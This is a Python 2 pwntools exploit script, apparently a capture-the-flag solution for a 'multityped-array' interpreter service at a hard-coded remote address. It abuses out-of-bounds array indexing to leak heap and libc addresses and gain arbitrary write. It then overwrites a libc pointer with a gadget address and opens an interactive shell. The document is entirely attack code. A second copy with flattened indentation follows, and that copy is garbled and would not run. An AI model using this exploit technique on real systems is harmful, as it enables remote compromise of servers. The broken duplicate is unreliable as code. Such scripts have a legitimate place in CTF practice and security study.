ujin5/multityped-array.py

## multityped-array.py
from pwn import *
from ctypes import *

def convert(s):
	return struct.unpack('<d', s)[0]
#s = process("./pwnme")
s = remote("15.164.131.100",9988)
def r(dat):
	s.recvuntil(">")
	s.sendline(dat)
def double_to_hex(f):
    return struct.unpack('<Q', struct.pack('<d', f))[0]
r("array m")
r("array k")
r("m[0] = 1")
r("k[0] = \"12341234\"")
for i in range(2,0x100):
	r("m[%d]=1234"%i)
for i in range(2,0x100):
	r("delete m[%d]"%i)
r("delete m[0]")
r("m[96] = 4294967295")
r("k[1] = \"%s\""%("A"*0x40))
r("m[1054] = \"1234\"")
r("print k[1]")
heap = u64(s.recvuntil("A")[-9:-1])
print "heap @ "+hex(heap)
r("array victim")
r("m[%d]=4294967295"%(-2031%4294967295))
r("victim[0] = 1")
for i in range(2,0x8002):
	r("victim[%d]=1234"%i)
	#print i
r("m[-2117]=\"AAAAAAAAAAAAAAAA\"")

print "ok"
r("array hello1")
def write(address, offset):
	high = address>>32
	low = address&0xffffffff
	r("m[-4]=%d"%high)
	props = 2118
	r("m[-2118]=%d"%offset)
	r("victim[%d]=1234"%low)

write(0x414141414142, 3122)
r("array base")
for i in range(2,0x20):
	r("base[%d]=\"%s\""%(i,"A"*0x100))
for i in range(2,0x20):
	r("delete base[%d]"%i)
unsorted = heap + 0x35bd6
print hex(unsorted)
#unsorted = 0x4141414142
write(unsorted, 3123)
r("print hello1[0]")
s.recvuntil(" FLOAT64 ")
leak = s.recvuntil("\n")[:-1]
leak = double_to_hex(float(leak)) >> 16
libc = leak + 0x100000000 - 0x3ebca0
print "libc @ "+hex(libc)
raw_input()
r("array hello2")
write(libc+0x3ed8e8-2, 3123)
one_shot = convert(p64((libc+0x4f440<<16) - 0x1000000000000))
print ("hello1[0]="+str(one_shot))
r("hello1[0]="+str(one_shot))
s.interactive()
	from pwn import *
	from ctypes import *

	def convert(s):
	return struct.unpack('<d', s)[0]
	#s = process("./pwnme")
	s = remote("15.164.131.100",9988)
	def r(dat):
	s.recvuntil(">")
	s.sendline(dat)
	def double_to_hex(f):
	return struct.unpack('<Q', struct.pack('<d', f))[0]
	r("array m")
	r("array k")
	r("m[0] = 1")
	r("k[0] = \"12341234\"")
	for i in range(2,0x100):
	r("m[%d]=1234"%i)
	for i in range(2,0x100):
	r("delete m[%d]"%i)
	r("delete m[0]")
	r("m[96] = 4294967295")
	r("k[1] = \"%s\""%("A"*0x40))
	r("m[1054] = \"1234\"")
	r("print k[1]")
	heap = u64(s.recvuntil("A")[-9:-1])
	print "heap @ "+hex(heap)
	r("array victim")
	r("m[%d]=4294967295"%(-2031%4294967295))
	r("victim[0] = 1")
	for i in range(2,0x8002):
	r("victim[%d]=1234"%i)
	#print i
	r("m[-2117]=\"AAAAAAAAAAAAAAAA\"")

	print "ok"
	r("array hello1")
	def write(address, offset):
	high = address>>32
	low = address&0xffffffff
	r("m[-4]=%d"%high)
	props = 2118
	r("m[-2118]=%d"%offset)
	r("victim[%d]=1234"%low)

	write(0x414141414142, 3122)
	r("array base")
	for i in range(2,0x20):
	r("base[%d]=\"%s\""%(i,"A"*0x100))
	for i in range(2,0x20):
	r("delete base[%d]"%i)
	unsorted = heap + 0x35bd6
	print hex(unsorted)
	#unsorted = 0x4141414142
	write(unsorted, 3123)
	r("print hello1[0]")
	s.recvuntil(" FLOAT64 ")
	leak = s.recvuntil("\n")[:-1]
	leak = double_to_hex(float(leak)) >> 16
	libc = leak + 0x100000000 - 0x3ebca0
	print "libc @ "+hex(libc)
	raw_input()
	r("array hello2")
	write(libc+0x3ed8e8-2, 3123)
	one_shot = convert(p64((libc+0x4f440<<16) - 0x1000000000000))
	print ("hello1[0]="+str(one_shot))
	r("hello1[0]="+str(one_shot))
	s.interactive()